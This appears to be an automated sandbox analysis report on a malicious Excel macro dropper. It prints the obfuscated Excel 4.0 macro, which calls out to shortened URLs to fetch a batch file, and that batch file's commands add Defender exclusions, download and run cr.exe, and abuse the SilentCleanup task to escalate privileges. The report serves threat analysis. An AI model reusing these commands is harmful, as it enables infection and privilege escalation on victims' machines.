                                                        Preview: L..................F.... ...j.U..{..@.t......,~......j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..L..(R.. .UL9KPU~1.XLS..J.......Q.y.Q.y*...8.....................u.l.9.k.p.U.w.Y.e.l...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\ul9kpUwYel.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.l.9.k.p.U.w.Y.e.l...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1LYCPT5GDMC5WV088G26.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20519T597D0EZEFAD1MF.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNBQABH49BUBWNJMEEIM.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T70ZP6LTUP685KT127GQ.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2MFNCCZKET1DP3F8CLA.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLLWWEN87DPEWAHB9XA5.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\cr.exe
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                        Category:dropped
                                                        Size (bytes):565248
                                                        Entropy (8bit):7.234649741813346
                                                        Encrypted:false
                                                        SSDEEP:12288:4olpZq/qtrvH5GxZ8cyGdGYa3JbD/ON/5Eg:4orZq/q9CYG8YAJbDmN
                                                        MD5:740E559929463320CB8E0403FD35A097
                                                        SHA1:CFE5A0BF2D21B6C36930DCC942849086DDEC9134
                                                        SHA-256:BAB37B37285FABDDA77B8C7EEA78B97EE1EF087DF7ECA796E3D49C4205DE6BD1
                                                        SHA-512:D56B448064828AEEC98536CAA9F3264327871FABA16D8B8FAD48D9C2781C994D93C2A85DE1C3EDAEC5EC736671673FFFF24D46C8070B960FED9A5958DD9C6501
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 72%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e*...y...y...y..y..y..y..y..y...y.rpy...y...y...y..y...y..y...y..y...yRich...y................PE..L......^.................0........7..6?...7...@...@...........................@..............................................q@.`.....@..q..................................................T8?.......?.H...........................................UPX0......7.............................UPX1.....0....7..(..................@....rsrc.........@..t...,..............@......................................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                        C:\Users\user\Desktop\251F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Category:dropped
                                                        Size (bytes):297703
                                                        Entropy (8bit):7.748820416386462
                                                        Encrypted:false
                                                        SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2Nd00PRkbE4ASEg7R6aNeMs64oYiyJT4JQIMWg:nn9ASKaNeEYLTfIM3
                                                        MD5:62B4022B1E29913ECFA4F5D47807C60E
                                                        SHA1:EAEF7910733990E9D863040550E459D2EEAE7943
                                                        SHA-256:1BF64FCE96A41E7121C1A12698171DDFED3FE227941AA61E69F378C3AF405587
                                                        SHA-512:90C980B3A9FB4045A5951506BF9350D7861FFEF5203EEDFDA1751B840994D5BFE30DE9BC8597B028F07B9C101D2EAA99AFD0008AAC595A37A212712B36AC8974
                                                        Malicious:false
                                                        Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                        C:\Users\user\Documents\pd.bat
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):2000
                                                        Entropy (8bit):5.3585901083999214
                                                        Encrypted:false
                                                        SSDEEP:48:dnjA3VfSfC/7vUVfSfC/7vQVfSfC/7vu1AQ:dnM30K/Q0K/k0K/sAQ
                                                        MD5:C771FD125198A4C0339E354183CD48A9
                                                        SHA1:47399A8E8FC4FE8A41703A587EC26C2837C6BA3A
                                                        SHA-256:9B46B9922BE2E0A9CDEE75F02F86C6CA9ECA965A2CA84EAAB8A997A2BC11E768
                                                        SHA-512:5BBA903C99973959CD090AB1483F66AA2B13823F180E26C369892996A6163E6E28BC4623C1CCE095ED6D3A944F384A84058313B2DC847B2EE92B9185C797C2FC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                        • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                        Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2;

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                        Entropy (8bit):7.822763112772762
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                        File name:ul9kpUwYel.xls
                                                        File size:281600
                                                        MD5:c2ca4d5f2632597023b6cf5b496fb4ed
                                                        SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
                                                        SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
                                                        SHA512:67c000984f8811626fcebb522b21399a29bc51fbddae108c08af6760cf57720ffc87eb4fdb448cfe4a8d0f355e30a46f804619dfb7cccadcbfae9a3e1339c4ca
                                                        SSDEEP:6144:fnSGiysRchNXHfA1MiWhZFVEld+Dr7EU/RdbM4oSEIbWyaNekMiYg4iyJTQJQgTH:2WloSVaNeM4rT3gTH
                                                        File Content Preview:........................;...................................#..................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:e4eea286a4b4bcb4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "ul9kpUwYel.xls"

                                                        Indicators

                                                        Has Summary Info:True
                                                        Application Name:unknown
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:True

                                                        Summary

                                                        Code Page:1252
                                                        Last Saved By:blobijump
                                                        Create Time:2020-09-20 21:17:44
                                                        Last Saved Time:2021-01-03 23:14:32
                                                        Security:1

                                                        Document Summary

                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:False
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:1048576

                                                        Streams

                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        File Type:data
                                                        Stream Size:276
                                                        Entropy:3.16930549839
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        File Type:data
                                                        Stream Size:156
                                                        Entropy:3.29938329109
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 276911
                                                        General
                                                        Stream Path:Workbook
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:276911
                                                        Entropy:7.85404453629
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                        Macro 4.0 Code

                                                        ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/ZjsbPXY','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 8, 2021 09:06:06.970048904 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.010096073 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.010205030 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.033577919 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.073527098 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078279972 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078305006 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078320026 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078397036 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.085994005 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.126003981 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.126857042 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.329070091 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:11.254014015 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:11.293910980 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:11.354618073 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:11.354665995 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:11.354723930 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:11.358566046 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.405617952 CET804916737.46.150.139192.168.2.22
                                                        Jan 8, 2021 09:06:11.405689001 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.405921936 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.458991051 CET804916737.46.150.139192.168.2.22
                                                        Jan 8, 2021 09:06:11.459027052 CET804916737.46.150.139192.168.2.22
                                                        Jan 8, 2021 09:06:11.459093094 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.517374039 CET4916780192.168.2.2237.46.150.139
